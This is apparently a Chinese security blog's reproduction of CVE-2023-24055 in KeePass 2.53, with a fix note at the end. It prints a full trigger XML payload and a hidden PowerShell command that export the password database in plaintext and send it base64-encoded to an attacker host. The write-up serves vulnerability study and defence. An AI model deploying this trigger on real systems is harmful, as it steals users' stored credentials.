安全播报

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
CVE-2023-24055 KeePass敏感信息明文传输漏洞复现
2023-02-22 11:21:25 【

   由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

   如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。

   一、漏洞描述 漏洞简述

   KeePass 是一款免费的开源密码管理器,可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中,该数据库由一把****锁定。因此,您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法(AES-256、ChaCha20 和 Twofish)进行加密。

   对 KeePass 配置文件具有写入权限的攻击者可以修改它并注入恶意触发器,例如通过添加导出触发器来获取明文密码。

    漏洞影响范围

   供应商:KeePass

   产品:KeePass Password Safe 2

   确认受影响版本:KeePass 2.53版本

   修复版本:KeePass 2.53.1版本

   二、漏洞复现实战 环境搭建 Step 1 KeePass 2.53

   

   KeePass 版本

   下载地址:https://keepass.info/

    Step 2 KeePass翻译语言包

   下载地址:https://keepass.info/translations.html

   将语言包文件复制至安装路径下“Languages”文件夹下

   

   翻译语言包

   在KeePass中进入语言设置,切换语言

   

   切换语言 漏洞复现

   根据原理,在安装路径下的配置文件KeePass.config.xml,根据触发器功能的安全缺陷进行利用。

   创建一个触发器,在密码数据库存在交互时进行明文传输。触发器创建主要细分为两种方式:

   (1)POC写入配置文件

   将编写好的POC代码写入KeePass.config.xml,须符合触发器XML格式。

   其中<Parameter>c:Users???AppDataLocalTempexploit.xml</Parameter>字段为明文传输路径。

   利用powershell以GET方式传输数据库中密码文件。

   POC:

 <TriggerSystem> 
   <Triggers>
               <Trigger>
                   <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
                   <Name>exploit</Name>
                   <Events>
                       <Event>
                           <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
                           <Parameters>
                               <Parameter>0</Parameter>
                               <Parameter />
                           </Parameters>
                       </Event>
                   </Events>
                   <Conditions />
                   <Actions>
                       <Action>
                           <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
                           <Parameters>
                               <Parameter>c:Users???AppDataLocalTempexploit.xml</Parameter>
                               <Parameter>KeePass XML (2.x)</Parameter>
                               <Parameter />
                               <Parameter />
                           </Parameters>
                       </Action>
                       <Action>
                           <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
                           <Parameters>
                               <Parameter>PowerShell.exe</Parameter>
                               <Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:Users???AppDataLocalTempexploit.xml')));Invoke-WebRequest -uri http://192.168.XXX.XXX:8888/$var -Method GET </Parameter>
                               <Parameter>False</Parameter>
                               <Parameter>1</Parameter>
                               <Parameter />
                           </Parameters>
                       </Action>
                   </Actions>
               </Trigger>
           </Triggers>  
           </TriggerSystem>


   修改KeePass config xml

   保存KeePass.config.xml文件,触发器功能查看exploit触发器

   (2)通过触发器功能手工创建触发器

   以官方触发器构成为参考

   https://keepass.info/help/kb/trigger_examples.html

   exploit触发器配置如下:

   属性项:命名为exploit,其余默认配置

   

   触发器属性

   事件项:选择Saved database file(已保存数据库文件),判断条件选Equals(相等)

   

   触发器事件

   条件项:为空

   

   触发器条件

   操作项:

   1. 导出当前数据库

   文件路径为上述文件传输路径

   文件格式选择 KeePass XML (2.x)

   1. 执行命令行/URL

   文件路径为PowerShell.exe ,使触发器执行PowerShell

   参数选择攻击接收的路径

   窗口方式选择Hidden

   

   触发器操作

   完成创建,可以看到exploit触发器

   在攻击机 创建web服务,后续接收传输后的密码明文;

   在KeePass中新建一条密码记录并保存,可以看到攻击机终端已接收到明文信息

   

   添加记录

   收到明文传输内容

   进行base64解码,可以看到内容为密码记录内容,包含账号与密码等敏感信息。

   

   base64解码后结果 漏洞修复

   建议更新至KeePass 2.53.1 版本

    结束语

   本文主要介绍了CVE-2023-24055 KeePass敏感信息明文传输漏洞的复现过程,漏洞主要利用对 KeePass 配置文件在写入权限下可以修改它并注入恶意触发器,例如通过添加导出触发器来获取明文密码。

   

】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇多个严重CVE漏洞被发现,系内存类.. 下一篇GoDaddy源代码失窃服务器被安装恶..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800